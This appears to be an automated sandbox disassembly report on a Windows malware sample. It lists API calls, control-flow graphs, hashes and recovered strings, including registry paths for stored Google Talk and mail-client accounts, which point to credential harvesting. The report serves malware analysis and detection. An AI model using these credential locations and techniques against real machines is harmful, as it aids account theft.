                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                    • API String ID: 3071782539-966475738
                                                                                                    • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                    • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 367 40ccd7-40cd06 ??2@YAPAXI@Z 368 40cd08-40cd0d 367->368 369 40cd0f 367->369 370 40cd11-40cd24 ??2@YAPAXI@Z 368->370 369->370 371 40cd26-40cd2d call 404025 370->371 372 40cd2f 370->372 374 40cd31-40cd57 371->374 372->374 376 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 374->376 377 40cd59-40cd60 DeleteObject 374->377 377->376
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                    • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                    • memset.MSVCRT ref: 0040CD96
                                                                                                    • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2054149589-0
                                                                                                    • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                    • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 384 44b40e-44b415 GetModuleHandleA 385 44b455 384->385 386 44b417-44b426 call 44b42b 384->386 388 44b457-44b45b 385->388 395 44b48d 386->395 396 44b428-44b433 GetProcAddress 386->396 390 44b45d-44b465 GetModuleHandleA 388->390 391 44b49a call 44b49f 388->391 394 44b467-44b46f 390->394 394->394 397 44b471-44b474 394->397 399 44b48e-44b496 395->399 396->385 400 44b435-44b442 VirtualProtect 396->400 397->388 398 44b476-44b478 397->398 401 44b47e-44b486 398->401 402 44b47a-44b47c 398->402 408 44b498 399->408 404 44b454 400->404 405 44b444-44b452 VirtualProtect 400->405 406 44b487-44b488 GetProcAddress 401->406 402->406 404->385 405->404 406->395 408->397
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                    Strings
                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                    • API String ID: 1366857005-1079885057
                                                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 432 40ba28-40ba3a 433 40ba87-40ba9b call 406c62 432->433 434 40ba3c-40ba52 call 407e20 _mbsicmp 432->434 456 40ba9d call 4107f1 433->456 457 40ba9d call 404734 433->457 458 40ba9d call 404785 433->458 459 40ba9d call 403c16 433->459 460 40ba9d call 410a9c 433->460 439 40ba54-40ba6d call 407e20 434->439 440 40ba7b-40ba85 434->440 446 40ba74 439->446 447 40ba6f-40ba72 439->447 440->433 440->434 441 40baa0-40bab3 call 407e30 448 40bab5-40bac1 441->448 449 40bafa-40bb09 SetCursor 441->449 450 40ba75-40ba76 call 40b5e5 446->450 447->450 451 40bac3-40bace 448->451 452 40bad8-40baf7 qsort 448->452 450->440 451->452 452->449 456->441 457->441 458->441 459->441 460->441
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 882979914-1578091866
                                                                                                    • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                    • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                      • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 2152742572-0
                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76230A60,?,00000000), ref: 00410D1C
                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 889583718-2036018995
                                                                                                    • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                    • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3143880245-0
                                                                                                    • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                    • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 00406F4C
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`#v,00407A43,00000001,?,00000000,`#v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                    • free.MSVCRT ref: 00406F6D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemallocmemcpy
                                                                                                    • String ID: `#v
                                                                                                    • API String ID: 3056473165-272240289
                                                                                                    • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                    • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                    • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D5C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D7A
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408D98
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408DA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFontIndirect_mbscpymemset
                                                                                                    • String ID: Arial
                                                                                                    • API String ID: 3853255127-493054409
                                                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 520177685-3817206916
                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 145871493-0
                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
